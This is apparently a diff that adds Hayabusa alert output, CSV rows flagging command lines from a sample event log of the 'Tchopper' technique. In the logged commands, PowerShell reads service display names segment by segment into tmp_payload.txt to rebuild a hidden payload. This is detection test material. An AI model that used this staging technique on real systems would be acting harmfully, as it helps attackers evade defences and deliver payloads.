+2021-11-03 17:35:59.833 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:01.284 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:01.284 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xac8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:02.737 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa54 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:02.737 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:04.183 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf90 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:04.198 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:05.632 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:05.648 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:07.101 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:07.101 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x390 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:08.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:08.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x324 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:10.020 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:10.036 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:11.507 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:11.523 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:12.952 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:12.952 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbf8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:14.409 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:14.409 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc8c | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:15.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:15.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:17.308 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:17.324 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:18.775 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd10 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:18.790 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:20.263 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:20.263 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:21.707 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:21.722 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x660 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:23.164 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:23.164 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:24.619 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:24.619 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:26.075 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x38c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:26.075 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x950 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:27.559 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x324 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:27.575 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:29.014 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:29.014 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x22c | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:30.465 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:30.465 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:31.906 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:31.922 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc54 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:33.398 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 